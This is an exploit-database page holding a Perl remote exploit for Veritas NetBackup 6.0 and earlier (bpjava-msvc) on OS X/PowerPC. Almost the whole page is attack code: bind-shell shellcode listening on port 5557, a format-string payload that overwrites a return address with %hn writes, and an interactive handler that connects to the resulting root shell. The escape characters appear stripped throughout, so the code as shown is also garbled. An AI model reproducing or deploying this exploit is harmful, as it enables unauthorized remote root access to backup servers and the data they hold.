[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Veritas NetBackup <= 6.0 (bpjava-msvc) Remote Exploit (OS X)
# Published : 2005-10-20
# Author : Kevin Finisterre
# Previous Title : HP-UX FTP Server Preauthentication Directory Listing Exploit (meta)
# Next Title : Veritas NetBackup <= 6.0 (bpjava-msvc) Remote Exploit (linux)
#!/usr/bin/perl
# VERITAS-OSX.pl - VERITAS NetBackup Format Strings OSX/ppc Remote Exploit
# johnh[at]digitalmunition[dot]com
# bug found by kf_lists[at]digitalmunition[dot]com
# http://www.digitalmunition.com/
use POSIX;
use IO::Socket;
use IO::Select;
my $shellcode = # /* OSX BINDSHELLCODE PORT=5557 NO-0x0 */
"x60x60x60x60" x 10 .
"x7cx63x1ax79x40x82xffxfdx7dxa8x02xa6x38xc3xe1x1d".
"x39x80x01x18x39xadx1fxffx81xcdxe1x21x81xedxe1x1d".
"x7dxefx72x78x91xedxe1x1dx7cx06x68xacx7cx01x04xac".
"x7cx06x6fxacx4cx01x01x2cx39xadxffxfcx39x8cxffxfb".
"x7dx8cx63x79x40x82xffxd8x94x81x7dx7dx94x61x7dx7e".
"x94x41x7dx79x94xe1x7dx1exe8xe1x7dx7dxd0xe1x7fx07".
"xd0x9fx66x07xe4xe1x7dx72xacxe3x68xcaxacxe1x7dx7f".
"xd0x69x7fxd9x94x41x7dx6fx94xe1x7dx17xd3x22x8ex07".
"xe8xe1x7dx7dxd0xe1x7fx07x94xe1x7dx15xd3x22x8ex07".
"xe8xe1x7dx7dxd0xe1x7fx07xd3x22x8ex07x94xe1x7dx61".
"x94x61x7dx6fx3cx60x82x97x94x40x82x97x94x60x82x8f".
"xe8xe1x7dx7dxd0xe1x7fx07xd0x9fx66x07x94x41x7dx7d".
"x94xe1x7dx25xd3x22x8ex07xd0x45x56x07xe8xe1x7dx7d".
"xd0xe1x7fx07x94x44x82x80x80xe4x82x80xecx63x82x9a".
"x94xe1x7dx3dxe8xe1x7dx7dxd0xe1x7fx07xd0x44x57x06".
"xecx63x82x82xd0x89x7fxd9x94x82x7dx57x3cx80x82x87".
"x3cx40x82x83x94x60x82x87x94xe1x7dx44xd0xe1x79xd3".
"xe8xe1x7dx7dxd0xe1x7fx07xd3x01x7dx77x83x83x14x11".
"x83x82x0ex17xacxe1x7dx7fxacxe1x7dx7f";
my $host = shift || '192.168.1.111';
my $port = shift || 13722;
my $sock = new IO::Socket::INET(
PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp');
$sock or die "no socket :$!";
print $sock " 118 1n" .
# "a" x 150 . "n";
$shellcode . "n";
print scalar <$sock>;
print scalar <$sock>;
#sleep 10;
print $sock " 101 6n" .
# my $ret = 0xbffe5738; # Saved return from frame 1 vsprintf
# write to 0xbffe5738+2 FIRST then write to 0xbffe5738.
# this allows the wrap past 0xffff to occur so we can form 0010
"xbfxfex57x3a" . "ZZZZ" . "xbfxfex57x38" . "%x" x 14 .
# shellcode is around 0x001009e8
# "%2474x" # 0x09e8
"%2280x" # 0x0920?
. "%hn" .
"%63212x." # form 0x0010 by wrapping past 0xffff
. "%hn".
"n" .
"A" x 50 . "n" .
"B" x 50 . "n" .
"C" x 50 . "n" .
# "D" x 50 . "n" . # shellcode alternate location?
$shellcode . "n" .
"E" x 50 . "rn";
print scalar <$sock>;
close $sock;
my $shellport = 5557;
print "[*] Connect to remote shell portn";
my $sock = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $host,
PeerPort => $shellport,
Type => SOCK_STREAM
);
if (! $sock)
{
print "[*] Error, Seems Failedn";
exit (0);
}
print "[*] G0t R00Tn";
StartShell ($sock);
sub StartShell
{
my ($client) = @_;
my $sel = IO::Select->new();
# unbuffered fun.
Unblock(*STDIN);
Unblock(*STDOUT);
Unblock($client);
select($client); $|++;
select(STDIN); $|++;
select(STDOUT); $|++;
$sel->add($client);
$sel->add(*STDIN);
while (fileno($client))
{
my $fd;
my @fds = $sel->can_read(1);
foreach $fd (@fds)
{
my $in = <$fd>;
if (! $in || ! $fd || ! $client)
{
print "[*] Closing connection.n";
close($client);
exit(0);
}
if ($fd eq $client)
{
print STDOUT $in;
} else {
print $client $in;
}
}
}
close ($client);
exit (0);
}
sub Unblock {
my $fd = shift;
my $flags;
$flags = fcntl($fd,F_GETFL,0) || die "Can't get flags for file handle: $!n";
fcntl($fd, F_SETFL, $flags|O_NONBLOCK) || die "Can't make handle nonblocking: $!n";
}
# www.Syue.com [2005-10-20]